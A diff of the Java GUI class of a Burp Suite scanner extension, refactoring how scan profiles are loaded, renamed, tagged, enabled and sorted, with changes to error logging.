buttonGroup2.setSelected(profile.radio7.getModel(), true); - break; - case "Information": - buttonGroup2.setSelected(profile.radio8.getModel(), true); - break; - default: - break; - } - - switch (issueconfidence) { - case "Certain": - buttonGroup3.setSelected(profile.radio9.getModel(), true); - break; - case "Firm": - buttonGroup3.setSelected(profile.radio10.getModel(), true); - break; - case "Tentative": - buttonGroup3.setSelected(profile.radio11.getModel(), true); - break; - default: - break; - } + checkProfilesProperties(profiles_directory); + makeTagsFile(); + showTags(); + showProfiles("All"); + } catch (Exception e) { - callbacks.printError("BurpBountyGui line 1823:" + e.getMessage()); - } - } - - public void saveRequestAttackValues(RequestProfile profile) { - variationAttributes = new ArrayList(); - insertionPointType = new ArrayList(); - //Save attack with fields values - try { - //get GUI values - ProfilesProperties newfile = new ProfilesProperties(); - - if (profile.text1.getText().length() >= 35) { - newfile.setName(profile.text1.getText().substring(0, 34)); - } else { - newfile.setName(profile.text1.getText()); - } - - if (profile.textauthor.getText().length() >= 35) { - newfile.setAuthor(profile.textauthor.getText().substring(0, 34)); - } else { - newfile.setAuthor(profile.textauthor.getText()); - } - - newfile.setScanner(3); - - newfile.setEnabled(true); - List greps = new ArrayList(); - List tags = new ArrayList(); - - newfile.setGrepsFile(profile.textgreps.getText()); - - for (int i = 0; i < profile.modelgrep.getRowCount(); i++) { - if (!profile.modelgrep.getValueAt(i, 3).toString().isEmpty()) { - greps.add(profile.modelgrep.getValueAt(i, 0).toString() + "," + profile.modelgrep.getValueAt(i, 1).toString() + "," + profile.modelgrep.getValueAt(i, 2).toString() + "," + profile.modelgrep.getValueAt(i, 3).toString() + "," + profile.modelgrep.getValueAt(i, 4).toString()); - } - } - newfile.setGreps(greps); - - for (int i = 0; i < profile.listtag.getModel().getSize(); i++) { - Object item = profile.listtag.getModel().getElementAt(i); - if (!item.toString().isEmpty()) { - tags.add(item.toString().replaceAll("\r", "").replaceAll("\n", "")); - } - } - if (!tags.contains("All")) { - tags.add("All"); - newfile.setTags(tags); - } else { - newfile.setTags(tags); + System.out.println("BurpBountyGui: line 461"); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); } - - if (profile.radio4.isSelected()) { - newfile.setMatchType(1); - } else if (profile.radio3.isSelected()) { - newfile.setMatchType(2); - } else { - newfile.setMatchType(0); - } - - newfile.setVariationAttributes(variationAttributes); - - newfile.setCaseSensitive(profile.check1.isSelected()); - newfile.setNotResponse(profile.check4.isSelected()); - newfile.setIssueName(profile.text4.getText()); - newfile.setIssueDetail(profile.textarea1.getText()); - newfile.setIssueBackground(profile.textarea2.getText()); - newfile.setRemediationDetail(profile.textarea3.getText()); - newfile.setRemediationBackground(profile.textarea4.getText()); - - if (profile.radio5.isSelected()) { - newfile.setIssueSeverity("High"); - } else if (profile.radio6.isSelected()) { - newfile.setIssueSeverity("Medium"); - } else if (profile.radio7.isSelected()) { - newfile.setIssueSeverity("Low"); - } else if (profile.radio8.isSelected()) { - newfile.setIssueSeverity("Information"); - } else { - newfile.setIssueSeverity(""); - } - - if (profile.radio9.isSelected()) { - newfile.setIssueConfidence("Certain"); - } else if (profile.radio10.isSelected()) { - newfile.setIssueConfidence("Firm"); - } else if (profile.radio11.isSelected()) { - newfile.setIssueConfidence("Tentative"); - } else { - newfile.setIssueConfidence(""); - } - - //Save start - Gson gson = new Gson(); - - JsonArray ijson = new JsonArray(); - List newjson = gson.fromJson(ijson, new TypeToken>() { - }.getType()); - newjson.add(newfile); - - String json = gson.toJson(newjson); - - //Write JSON String to file - FileOutputStream fileStream; - - if (profile.text1.getText().length() >= 35) { - fileStream = new FileOutputStream(new File(profiles_directory + profile.text1.getText().substring(0, 34).concat(".bb"))); - } else { - fileStream = new FileOutputStream(new File(profiles_directory + profile.text1.getText().concat(".bb"))); - } - - OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8"); - writer.write(json); - writer.close(); - fileStream.close(); - - } catch (IOException e) { - callbacks.printError("BurpBountyGui line 1571:"); } } - public void setSelectedVariations(boolean state, ActiveProfile profile) { - profile.status_code.setSelected(state); - profile.input_image_labels.setSelected(state); - profile.non_hidden_form_input_types.setSelected(state); - profile.page_title.setSelected(state); - profile.visible_text.setSelected(state); - profile.button_submit_labels.setSelected(state); - profile.div_ids.setSelected(state); - profile.word_count.setSelected(state); - profile.content_type.setSelected(state); - profile.outbound_edge_tag_names.setSelected(state); - profile.whole_body_content.setSelected(state); - profile.etag_header.setSelected(state); - profile.visible_word_count.setSelected(state); - profile.content_length.setSelected(state); - profile.header_tags.setSelected(state); - profile.tag_ids.setSelected(state); - profile.comments.setSelected(state); - profile.line_count.setSelected(state); - profile.set_cookie_names.setSelected(state); - profile.last_modified_header.setSelected(state); - profile.first_header_tag.setSelected(state); - profile.tag_names.setSelected(state); - profile.input_submit_labels.setSelected(state); - profile.outbound_edge_count.setSelected(state); - profile.initial_body_content.setSelected(state); - profile.content_location.setSelected(state); - profile.limited_body_content.setSelected(state); - profile.canonical_link.setSelected(state); - profile.css_classes.setSelected(state); - profile.location.setSelected(state); - profile.anchor_labels.setSelected(state); - } - - public void updatePayloads(String file, ProfilesProperties issue) { + public void createDirectories(String profiles_directory) { - //Load file for implement payloads - List payloads = new ArrayList(); - String line; - File fileload = new File(file); + File profiles = new File(profiles_directory); - try { - BufferedReader bufferreader = new BufferedReader(new FileReader(fileload.getAbsolutePath())); - line = bufferreader.readLine(); - - while (line != null) { - payloads.add(line); - line = bufferreader.readLine(); - } - bufferreader.close(); - - issue.setPayloads(payloads); - - Gson gson = new Gson(); - String strJson = gson.toJson(issue); - FileWriter writer = null; - - writer = new FileWriter(profiles_directory + issue.getName().concat(".bb")); - writer.write("[" + strJson + "]"); - - writer.close(); - } catch (FileNotFoundException ex) { - callbacks.printError("BurpBountyGui line 1639:"); - } catch (IOException ex) { - callbacks.printError("BurpBountyGui line 1042:"); + if (!profiles.exists()) { + profiles.mkdir(); } } @@ -1589,65 +228,179 @@ public void updateGreps(String file, ProfilesProperties issue) { issue.setGreps(greps); - Gson gson = new Gson(); + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); String strJson = gson.toJson(issue); FileWriter writer = null; - writer = new FileWriter(profiles_directory + issue.getName().concat(".bb")); + writer = new FileWriter(profiles_directory + File.separator + issue.getProfileName().concat(".bb")); writer.write("[" + strJson + "]"); writer.close(); } catch (FileNotFoundException ex) { - callbacks.printError("BurpBountyGui line 1675:" + ex.getMessage()); + System.out.println("BurpBountyGui line 1675:" + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } } catch (IOException ex) { - callbacks.printError("BurpBountyGui line 1078:" + ex.getMessage()); + System.out.println("BurpBountyGui line 1078:" + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } } } - - private List readFile(String filename) { List records = new ArrayList(); try { - BufferedReader reader = new BufferedReader(new FileReader(filename)); + FileReader reader2 = new FileReader(filename); + BufferedReader reader = new BufferedReader(reader2); String line; while ((line = reader.readLine()) != null) { records.add(line); } + reader2.close(); reader.close(); } catch (Exception e) { System.out.println("BurpBountyGui line 1882:" + e.getMessage()); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } } return records; } - public JsonArray initJson() { - //Init json form filename + public void checkProfilesProperties(String profiles_directory) { FileReader fr; - try { - JsonArray data = new JsonArray(); - File f = new File(profiles_directory); - if (f.exists() && f.isDirectory()) { - for (File file : f.listFiles()) { - if (file.getName().endsWith(".bb")) { + JsonArray alldata = new JsonArray(); + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + File f = new File(profiles_directory); + + if (f.exists() && f.isDirectory()) { + for (File file : f.listFiles()) { + if (file.getName().endsWith(".bb")) { + try { fr = new FileReader(file.getAbsolutePath()); + } catch (IOException ex) { + System.out.println("BurpBountyGui line 1796:" + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + continue; + } + + JsonParser parser = new JsonParser(); + JsonArray data = new JsonArray(); + ProfilesProperties profile_property; + + try { JsonReader json = new JsonReader((fr)); - JsonParser parser = new JsonParser(); data.addAll(parser.parse(json).getAsJsonArray()); + Object idata = data.get(0); + profile_property = gson.fromJson(idata.toString(), ProfilesProperties.class); + + String name = ""; + name = profile_property.getProfileName(); + JsonObject bbObj = data.get(0).getAsJsonObject(); + if (name == null) { + name = profile_property.getName(); + if (name == null) { + System.out.println("Profile name corrupted"); + continue; + } else { + bbObj.remove("Name"); + bbObj.addProperty("ProfileName", name); + } + } + data = new JsonArray(); + data.add(bbObj); + alldata.addAll(data); + } catch (Exception e) { + System.out.println("BurpBountyGui line 1939"); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } + continue; + } + + try { fr.close(); - json.close(); + } catch (IOException ex) { + System.out.println("BurpBountyGui line 1825:" + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + continue; } } } - return data; - } catch (Exception e) { - callbacks.printError("BurpBountyGui line 1823:" + e.getMessage()); - return null; + } + parent.setAllProfiles(alldata); + allprofiles = alldata; + setActiveProfiles(allprofiles); + setPassiveProfiles(allprofiles); + } + + public void setActiveProfiles(JsonArray allprofiles) { + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + int scanner = 0; + ProfilesProperties issue; + Boolean enabled = false; + activeprofiles = new JsonArray(); + + for (int i = 0; i < allprofiles.size(); i++) { + try { + Object idata = allprofiles.get(i); + issue = gson.fromJson(idata.toString(), ProfilesProperties.class); + scanner = issue.getScanner(); + enabled = issue.getEnabled(); + } catch (Exception ex) { + System.out.println("BurpBountyExtension line 399: " + ex.getMessage()); + continue; + } + + if (scanner == 1 && enabled) { + activeprofiles.add(allprofiles.get(i)); + } + } + } + + public void setPassiveProfiles(JsonArray allprofiles) { + passiveresprofiles = new JsonArray(); + passivereqprofiles = new JsonArray(); + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + int scanner = 0; + Boolean enabled = false; + ProfilesProperties issue; + + for (int i = 0; i < allprofiles.size(); i++) { + try { + Object idata = allprofiles.get(i); + issue = gson.fromJson(idata.toString(), ProfilesProperties.class); + scanner = issue.getScanner(); + enabled = issue.getEnabled(); + } catch (Exception ex) { + System.out.println("BurpBountyExtension line 341: " + ex.getMessage()); + continue; + } + if (enabled && scanner == 2) { + passiveresprofiles.add(allprofiles.get(i)); + } else if (enabled && scanner == 3) { + passivereqprofiles.add(allprofiles.get(i)); + } } } + public JsonArray getProfiles() { + parent.setAllProfiles(allprofiles); + return allprofiles; + } + public String getClipboardContents() { //Get clipboard contents for implement grep and match paste button String result = ""; @@ -1659,7 +412,10 @@ public String getClipboardContents() { try { result = (String) contents.getTransferData(DataFlavor.stringFlavor); } catch (UnsupportedFlavorException | IOException ex) { - callbacks.printError("BurpBountyGui line 1866:" + ex.getMessage()); + System.out.println("BurpBountyGui line 1866:" + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } } } return result; @@ -1680,39 +436,20 @@ public void loadConfigFile() { text11.setText(file); + checkProfilesProperties(profiles_directory); makeTagsFile(); showTags(); showProfiles("All"); + filename = file; this.callbacks.saveExtensionSetting("filename", file); } } - public void loadPath(String file, DefaultListModel list) { - //Load file for implement payloads - DefaultListModel List = list; - String line; - File fileload = new File(file); - - try { - BufferedReader bufferreader = new BufferedReader(new FileReader(fileload.getAbsolutePath())); - line = bufferreader.readLine(); - - while (line != null) { - List.addElement(line); - line = bufferreader.readLine(); - } - bufferreader.close(); - } catch (FileNotFoundException ex) { - callbacks.printError("BurpBountyGui line 1912:" + ex.getMessage()); - } catch (IOException ex) { - callbacks.printError("BurpBountyGui line 1815:" + ex.getMessage()); - } - } - public void setEnableDisableProfile(String enable, JTable table) { - Gson gson = new Gson(); + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); JsonArray json2 = new JsonArray(); List newjson = gson.fromJson(json2, new TypeToken>() { @@ -1724,7 +461,8 @@ public void setEnableDisableProfile(String enable, JTable table) { try { String profile_name = table.getValueAt(row, 1).toString(); JsonArray data = new JsonArray(); - JsonReader json = new JsonReader(new FileReader(profiles_directory.concat(profile_name.concat(".bb")))); + FileReader reader = new FileReader(profiles_directory + File.separator + profile_name.concat(".bb")); + JsonReader json = new JsonReader(reader); JsonParser parser = new JsonParser(); data.addAll(parser.parse(json).getAsJsonArray()); @@ -1739,75 +477,32 @@ public void setEnableDisableProfile(String enable, JTable table) { } newjson.clear(); newjson.add(profile_properties); - FileOutputStream fileStream = new FileOutputStream(profiles_directory.concat(profile_name.concat(".bb"))); + FileOutputStream fileStream = new FileOutputStream(profiles_directory + File.separator + profile_name.concat(".bb")); String fjson = gson.toJson(newjson); OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8"); writer.write(fjson); - writer.close(); + reader.close(); json.close(); + writer.close(); } catch (IOException e) { - callbacks.printError("BurpBountyGui line 1956:" + e.getMessage()); - } - } - showProfiles("All"); - } - - public void setEnableDisableAllProfiles(String enable) { - - Gson gson = new Gson(); - File f = new File(profiles_directory); - - JsonArray json2 = new JsonArray(); - List newjson = gson.fromJson(json2, new TypeToken>() { - }.getType()); - - File[] files = f.listFiles(new FilenameFilter() { - @Override - public boolean accept(File dir, String name) { - if (name.toLowerCase().endsWith(".bb")) { - return true; - } else { - return false; - } - } - }); - - if (f.exists() && f.isDirectory()) { - for (File file : files) { - try { - JsonArray data = new JsonArray(); - JsonReader json = new JsonReader(new FileReader(file.getAbsolutePath())); - JsonParser parser = new JsonParser(); - data.addAll(parser.parse(json).getAsJsonArray()); - - Object idata = data.get(0); - ProfilesProperties profile_properties = gson.fromJson(idata.toString(), ProfilesProperties.class - ); - if (enable.contains("Yes")) { - profile_properties.setEnabled(true); - } else { - profile_properties.setEnabled(false); - } - newjson.clear(); - newjson.add(profile_properties); - FileOutputStream fileStream = new FileOutputStream(file.getAbsoluteFile()); - String fjson = gson.toJson(newjson); - OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8"); - writer.write(fjson); - writer.close(); - json.close(); - } catch (IOException e) { - callbacks.printError("BurpBountyGui line 207:" + e.getMessage()); + System.out.println("BurpBountyGui line 1956:" + e.getMessage()); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); } } } + checkProfilesProperties(profiles_directory); showProfiles("All"); + } + + public void deleteTagProfiles(String tag) { - Gson gson = new Gson(); + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); File f = new File(profiles_directory); JsonArray json2 = new JsonArray(); @@ -1829,13 +524,13 @@ public boolean accept(File dir, String name) { for (File file : files) { try { JsonArray data = new JsonArray(); - JsonReader json = new JsonReader(new FileReader(file.getAbsolutePath())); + FileReader reader = new FileReader(file.getAbsolutePath()); + JsonReader json = new JsonReader(reader); JsonParser parser = new JsonParser(); data.addAll(parser.parse(json).getAsJsonArray()); Object idata = data.get(0); - ProfilesProperties profile_properties = gson.fromJson(idata.toString(), ProfilesProperties.class - ); + ProfilesProperties profile_properties = gson.fromJson(idata.toString(), ProfilesProperties.class); List tags = profile_properties.getTags(); List finaltags = new ArrayList(); if (tags != null) { @@ -1852,85 +547,70 @@ public boolean accept(File dir, String name) { String fjson = gson.toJson(newjson); OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8"); writer.write(fjson); + reader.close(); writer.close(); json.close(); } catch (IOException e) { - callbacks.printError("BurpBountyGui line 2065:" + e.getMessage()); + System.out.println("BurpBountyGui line 2065:" + e.getMessage()); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } } } } + checkProfilesProperties(profiles_directory); showProfiles("All"); } public void makeTagsFile() { - Gson gson = new Gson(); - File f = new File(profiles_directory); - - File[] files = f.listFiles(new FilenameFilter() { - @Override - public boolean accept(File dir, String name) { - if (name.toLowerCase().endsWith(".bb")) { - return true; - } else { - return false; - } - } - }); - + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + allprofiles = getProfiles(); List tags = new ArrayList(); - if (f.exists() && f.isDirectory()) { - for (File file : files) { - try { - JsonArray data = new JsonArray(); - JsonReader json = new JsonReader(new FileReader(file.getAbsolutePath())); - JsonParser parser = new JsonParser(); - data.addAll(parser.parse(json).getAsJsonArray()); - Object idata = data.get(0); - ProfilesProperties profile_properties = gson.fromJson(idata.toString(), ProfilesProperties.class - ); - if (profile_properties.getTags() != null) { - tags.addAll(profile_properties.getTags()); - } - json.close(); - } catch (IOException e) { - System.out.println("BurpBountyGui line 2107:" + e.getMessage()); + for (int i = 0; i < allprofiles.size(); i++) { + Object idata = allprofiles.get(0); + ProfilesProperties profile_properties; + try { + profile_properties = gson.fromJson(idata.toString(), ProfilesProperties.class); + tags.addAll(profile_properties.getTags()); + } catch (IllegalStateException e) { + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); } - + continue; } + } - Set singles = new TreeSet<>(); - Set multiples = new TreeSet<>(); + Set singles = new TreeSet<>(); + Set multiples = new TreeSet<>(); - for (String x : tags) { - if (!multiples.contains(x)) { - if (singles.contains(x)) { - singles.remove(x); - multiples.add(x); - } else { - singles.add(x); - } + for (String x : tags) { + if (!multiples.contains(x)) { + if (singles.contains(x)) { + singles.remove(x); + multiples.add(x); + } else { + singles.add(x); } } + } - tags.clear(); - tags.addAll(singles); - tags.addAll(multiples); - File file = new File(profiles_directory + File.separator + "tags.txt"); - if (!file.exists()) { - file.getParentFile().mkdirs(); - } + tags.clear(); + tags.addAll(singles); + tags.addAll(multiples); + File file = new File(profiles_directory + File.separator + "tags.txt"); + if (!file.exists()) { + file.getParentFile().mkdirs(); + } - List existenttags = readFile(profiles_directory + File.separator + "tags.txt"); - for (String tag : tags) { - if (!existenttags.contains(tag)) { - addNewTag(tag); + List existenttags = readFile(profiles_directory + File.separator + "tags.txt"); + for (String tag : tags) { + if (!existenttags.contains(tag)) { + addNewTag(tag); - } } - } else { - System.out.println("Profile directory don't exist"); } } @@ -1947,7 +627,8 @@ public void tableChanged(TableModelEvent e) { if (checked) { try { - Gson gson = new Gson(); + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); JsonArray json2 = new JsonArray(); List newjson = gson.fromJson(json2, new TypeToken>() { }.getType()); @@ -1955,67 +636,102 @@ public void tableChanged(TableModelEvent e) { String profile_name = model.getValueAt(row, 1).toString(); JsonArray data = new JsonArray(); - JsonReader json = new JsonReader(new FileReader(profiles_directory.concat(profile_name.concat(".bb")))); - JsonParser parser = new JsonParser(); - data.addAll(parser.parse(json).getAsJsonArray()); - - Object idata = data.get(0); - ProfilesProperties profile_properties = gson.fromJson(idata.toString(), ProfilesProperties.class - ); - - profile_properties.setEnabled(true); - - newjson.clear(); - newjson.add(profile_properties); - FileOutputStream fileStream = new FileOutputStream(profiles_directory.concat(profile_name.concat(".bb"))); - String fjson = gson.toJson(newjson); - OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8"); - writer.write(fjson); + JsonReader json; + OutputStreamWriter writer; + try ( FileReader reader = new FileReader(profiles_directory + File.separator + profile_name.concat(".bb"))) { + json = new JsonReader(reader); + JsonParser parser = new JsonParser(); + data.addAll(parser.parse(json).getAsJsonArray()); + Object idata = data.get(0); + ProfilesProperties profile_properties = gson.fromJson(idata.toString(), ProfilesProperties.class + ); + profile_properties.setEnabled(true); + newjson.clear(); + newjson.add(profile_properties); + FileOutputStream fileStream = new FileOutputStream(profiles_directory + File.separator + profile_name.concat(".bb")); + String fjson = gson.toJson(newjson); + writer = new OutputStreamWriter(fileStream, "UTF-8"); + writer.write(fjson); + } writer.close(); json.close(); + checkProfilesProperties(profiles_directory); - } catch (IOException ex) { - callbacks.printError("BurpBountyGui line 1956:" + ex.getMessage()); + } catch (Exception ex) { + System.out.println("BurpBountyGui line 1956:" + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } } } else { try { - Gson gson = new Gson(); + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); JsonArray json2 = new JsonArray(); List newjson = gson.fromJson(json2, new TypeToken>() { }.getType()); String profile_name = model.getValueAt(row, 1).toString(); JsonArray data = new JsonArray(); - JsonReader json = new JsonReader(new FileReader(profiles_directory.concat(profile_name.concat(".bb")))); - JsonParser parser = new JsonParser(); - data.addAll(parser.parse(json).getAsJsonArray()); - - Object idata = data.get(0); - ProfilesProperties profile_properties = gson.fromJson(idata.toString(), ProfilesProperties.class - ); - - profile_properties.setEnabled(false); - - newjson.clear(); - newjson.add(profile_properties); - FileOutputStream fileStream = new FileOutputStream(profiles_directory.concat(profile_name.concat(".bb"))); - String fjson = gson.toJson(newjson); - OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8"); - writer.write(fjson); - writer.close(); + JsonReader json; + try ( FileReader reader = new FileReader(profiles_directory + File.separator + profile_name.concat(".bb"))) { + json = new JsonReader(reader); + JsonParser parser = new JsonParser(); + data.addAll(parser.parse(json).getAsJsonArray()); + Object idata = data.get(0); + ProfilesProperties profile_properties = gson.fromJson(idata.toString(), ProfilesProperties.class + ); + profile_properties.setEnabled(false); + newjson.clear(); + newjson.add(profile_properties); + FileOutputStream fileStream = new FileOutputStream(profiles_directory + File.separator + profile_name.concat(".bb")); + String fjson = gson.toJson(newjson); + try ( OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8")) { + writer.write(fjson); + } + } json.close(); + checkProfilesProperties(profiles_directory); - } catch (IOException ex) { - callbacks.printError("BurpBountyGui line 1956:" + ex.getMessage()); + } catch (Exception ex) { + System.out.println("BurpBountyGui line 1956:" + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } } } + } } } + + public int getContentLength(IHttpRequestResponse response) { + IResponseInfo response_info; + try { + response_info = helpers.analyzeResponse(response.getResponse()); + } catch (NullPointerException ex) { + System.out.println("Utils line 1279: " + ex.getMessage()); + return 0; + } + + int ContentLength = 0; + + for (String headers : response_info.getHeaders()) { + if (headers.toUpperCase().startsWith("CONTENT-LENGTH:")) { + ContentLength = Integer.parseInt(headers.split("\\s+")[1]); + break; + } + } + return ContentLength; + } + + + public void showProfiles(String Tag) { - JsonArray json = initJson(); - Gson gson = new Gson(); + JsonArray json = getProfiles(); + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); ProfilesProperties profile_property; //model for active profiles model.setNumRows(0); @@ -2030,8 +746,13 @@ public void showProfiles(String Tag) { table3.getColumnModel().getColumn(2).setMaxWidth(150); table3.getColumnModel().getColumn(1).setPreferredWidth(850); - TableRowSorter sorter = new TableRowSorter<>(table3.getModel()); - table3.setRowSorter(sorter); + TableRowSorter sorter3 = new TableRowSorter<>(table3.getModel()); + table3.setRowSorter(sorter3); + List sortKeys3 = new ArrayList<>(); + sortKeys3.add(new RowSorter.SortKey(1, SortOrder.ASCENDING)); + sorter3.setSortKeys(sortKeys3); + sorter3.sort(); + table3.setAutoResizeMode(JTable.AUTO_RESIZE_ALL_COLUMNS); table3.getModel().addTableModelListener(new profilesModelListener()); @@ -2050,6 +771,10 @@ public void showProfiles(String Tag) { TableRowSorter sorter1 = new TableRowSorter<>(table1.getModel()); table1.setRowSorter(sorter1); + List sortKeys1 = new ArrayList<>(); + sortKeys1.add(new RowSorter.SortKey(1, SortOrder.ASCENDING)); + sorter1.setSortKeys(sortKeys1); + sorter1.sort(); table1.setAutoResizeMode(JTable.AUTO_RESIZE_ALL_COLUMNS); table1.getModel().addTableModelListener(new profilesModelListener()); @@ -2068,6 +793,10 @@ public void showProfiles(String Tag) { TableRowSorter sorter2 = new TableRowSorter<>(table2.getModel()); table2.setRowSorter(sorter2); + List sortKeys2 = new ArrayList<>(); + sortKeys2.add(new RowSorter.SortKey(1, SortOrder.ASCENDING)); + sorter2.setSortKeys(sortKeys1); + sorter2.sort(); table2.setAutoResizeMode(JTable.AUTO_RESIZE_ALL_COLUMNS); table2.getModel().addTableModelListener(new profilesModelListener()); @@ -2079,11 +808,11 @@ public void showProfiles(String Tag) { if (Tag.equals("All")) { if (profile_property.getScanner() == 1) { - model.addRow(new Object[]{profile_property.getEnabled(), profile_property.getName(), profile_property.getAuthor()}); + model.addRow(new Object[]{profile_property.getEnabled(), profile_property.getProfileName(), profile_property.getAuthor()}); } else if (profile_property.getScanner() == 2) { - model2.addRow(new Object[]{profile_property.getEnabled(), profile_property.getName(), profile_property.getAuthor()}); + model2.addRow(new Object[]{profile_property.getEnabled(), profile_property.getProfileName(), profile_property.getAuthor()}); } else if (profile_property.getScanner() == 3) { - model1.addRow(new Object[]{profile_property.getEnabled(), profile_property.getName(), profile_property.getAuthor()}); + model1.addRow(new Object[]{profile_property.getEnabled(), profile_property.getProfileName(), profile_property.getAuthor()}); } @@ -2093,23 +822,26 @@ public void showProfiles(String Tag) { for (String tag : profile_property.getTags()) { if (tag.equals(Tag) || Tag.isEmpty() || Tag.equals("All")) { if (profile_property.getScanner() == 1) { - model.addRow(new Object[]{profile_property.getEnabled(), profile_property.getName(), profile_property.getAuthor()}); + model.addRow(new Object[]{profile_property.getEnabled(), profile_property.getProfileName(), profile_property.getAuthor()}); } else if (profile_property.getScanner() == 2) { - model2.addRow(new Object[]{profile_property.getEnabled(), profile_property.getName(), profile_property.getAuthor()}); + model2.addRow(new Object[]{profile_property.getEnabled(), profile_property.getProfileName(), profile_property.getAuthor()}); } else if (profile_property.getScanner() == 3) { - model1.addRow(new Object[]{profile_property.getEnabled(), profile_property.getName(), profile_property.getAuthor()}); + model1.addRow(new Object[]{profile_property.getEnabled(), profile_property.getProfileName(), profile_property.getAuthor()}); } } } } catch (NullPointerException e) { + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } if (profile_property.getScanner() == 1) { - model.addRow(new Object[]{profile_property.getEnabled(), profile_property.getName(), profile_property.getAuthor()}); + model.addRow(new Object[]{profile_property.getEnabled(), profile_property.getProfileName(), profile_property.getAuthor()}); } else if (profile_property.getScanner() == 2) { - model2.addRow(new Object[]{profile_property.getEnabled(), profile_property.getName(), profile_property.getAuthor()}); + model2.addRow(new Object[]{profile_property.getEnabled(), profile_property.getProfileName(), profile_property.getAuthor()}); } else if (profile_property.getScanner() == 3) { - model1.addRow(new Object[]{profile_property.getEnabled(), profile_property.getName(), profile_property.getAuthor()}); + model1.addRow(new Object[]{profile_property.getEnabled(), profile_property.getProfileName(), profile_property.getAuthor()}); } @@ -2121,7 +853,8 @@ public void showProfiles(String Tag) { public void deleteProfile(JTable table) { - Gson gson = new Gson(); + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); File f = new File(profiles_directory); File[] files = f.listFiles(new FilenameFilter() { @@ -2141,7 +874,8 @@ public boolean accept(File dir, String name) { for (Integer row : rows) { try { JsonArray data = new JsonArray(); - JsonReader json = new JsonReader(new FileReader(file.getAbsolutePath())); + FileReader reader = new FileReader(file.getAbsolutePath()); + JsonReader json = new JsonReader(reader); JsonParser parser = new JsonParser(); data.addAll(parser.parse(json).getAsJsonArray()); @@ -2150,17 +884,24 @@ public boolean accept(File dir, String name) { ); String pname = table.getValueAt(row, 1).toString(); - if (pname.equals(i.getName())) { + if (pname.equals(i.getProfileName())) { + reader.close(); json.close(); - file.delete(); + Files.delete(file.toPath()); break; } + + reader.close(); } catch (IOException e) { - callbacks.printError("BurpBountyGui line 2490:" + e.getMessage()); + System.out.println("BurpBountyGui line 2490:" + e.getMessage()); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } } } } } + checkProfilesProperties(profiles_directory); showProfiles("All"); } @@ -2170,30 +911,32 @@ public String getProfilesFilename() { } public String getFilename() { - return filename; } public void addNewTag(String str) { if (!str.isEmpty()) { try { - BufferedWriter out = new BufferedWriter(new FileWriter(profiles_directory.concat("tags.txt"), true)); + BufferedWriter out = new BufferedWriter(new FileWriter(profiles_directory + File.separator + "tags.txt", true)); out.write(str.concat("\n")); out.close(); } catch (IOException e) { System.out.println("BurpBountyGui line 2497:" + e.getMessage()); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } } } } public void removeTag(String tag) { - String file = profiles_directory.concat("tags.txt"); + String file = profiles_directory + File.separator + "tags.txt"; try { File inFile = new File(file); if (!inFile.isFile()) { - callbacks.printError("BurpBountyGui line 2509:"); + System.out.println("BurpBountyGui line 2509:"); return; } @@ -2219,31 +962,34 @@ public void removeTag(String tag) { //Delete the original file if (!inFile.delete()) { - callbacks.printError("Could not delete file, line 2535"); + System.out.println("Could not delete file, line 2535"); return; } //Rename the new file to the filename the original file had. if (!tempFile.renameTo(inFile)) { - callbacks.printError("Could not rename file line 2541"); + System.out.println("Could not rename file line 2541"); } } catch (FileNotFoundException ex) { - callbacks.printError("BurpBountyGui line 2559:" + ex.getMessage()); + System.out.println("BurpBountyGui line 2559:" + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } } catch (IOException ex) { - callbacks.printError("BurpBountyGui line 2562:" + ex.getMessage()); + System.out.println("BurpBountyGui line 2562:" + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } } } public void showTags() { - List tags = readFile(profiles_directory.concat("tags.txt")); + List tags = readFile(profiles_directory + File.separator + "tags.txt"); newTagCombo2.removeAllItems(); tagmanager.removeAllElements(); - if (!tags.contains("All")) { - tags.add("All"); - } for (String tag : tags) { newTagCombo2.addItem(tag); tagmanager.addElement(tag); @@ -2251,11 +997,6 @@ public void showTags() { newTagCombo2.setSelectedItem("All"); } - /** - * This method is called from within the constructor to initialize the form. - * WARNING: Do NOT modify 